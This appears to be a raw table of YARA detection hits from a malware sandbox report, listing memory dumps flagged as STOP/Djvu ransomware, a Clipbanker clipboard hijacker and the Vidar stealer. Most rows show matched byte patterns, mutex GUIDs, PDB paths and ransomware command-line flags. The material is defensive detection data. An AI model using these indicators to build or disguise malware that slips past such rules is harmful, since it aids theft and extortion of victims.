29.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
29.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
1.2.mJVVW85CnW.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.2.mJVVW85CnW.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.2.mJVVW85CnW.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
33.2.mstsca.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
33.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
33.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
11.2.mJVVW85CnW.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.2.mJVVW85CnW.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
11.2.mJVVW85CnW.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
10.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.2.mJVVW85CnW.exe.5e315a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0.2.mJVVW85CnW.exe.5e315a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0.2.mJVVW85CnW.exe.5e315a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
12.2.build3.exe.23215a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
12.2.build3.exe.23215a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
12.2.build3.exe.23215a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
1.2.mJVVW85CnW.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.2.mJVVW85CnW.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.2.mJVVW85CnW.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
25.2.mstsca.exe.8515a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
25.2.mstsca.exe.8515a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
6.2.mJVVW85CnW.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
6.2.mJVVW85CnW.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
6.2.mJVVW85CnW.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
23.2.mJVVW85CnW.exe.5df15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
23.2.mJVVW85CnW.exe.5df15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
23.2.mJVVW85CnW.exe.5df15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.2.build2.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
5.2.mJVVW85CnW.exe.5e115a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
5.2.mJVVW85CnW.exe.5e115a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
5.2.mJVVW85CnW.exe.5e115a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
4.2.mJVVW85CnW.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
4.2.mJVVW85CnW.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
4.2.mJVVW85CnW.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
24.2.mJVVW85CnW.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
24.2.mJVVW85CnW.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
24.2.mJVVW85CnW.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
6.2.mJVVW85CnW.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
6.2.mJVVW85CnW.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
6.2.mJVVW85CnW.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
4.2.mJVVW85CnW.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
4.2.mJVVW85CnW.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
4.2.mJVVW85CnW.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
5.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
5.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
5.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
23.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
23.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
23.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
3.2.mJVVW85CnW.exe.5df15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
3.2.mJVVW85CnW.exe.5df15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
3.2.mJVVW85CnW.exe.5df15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.2.mJVVW85CnW.exe.5e315a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0.2.mJVVW85CnW.exe.5e315a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0.2.mJVVW85CnW.exe.5e315a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.mJVVW85CnW.exe.5e115a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.mJVVW85CnW.exe.5e115a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
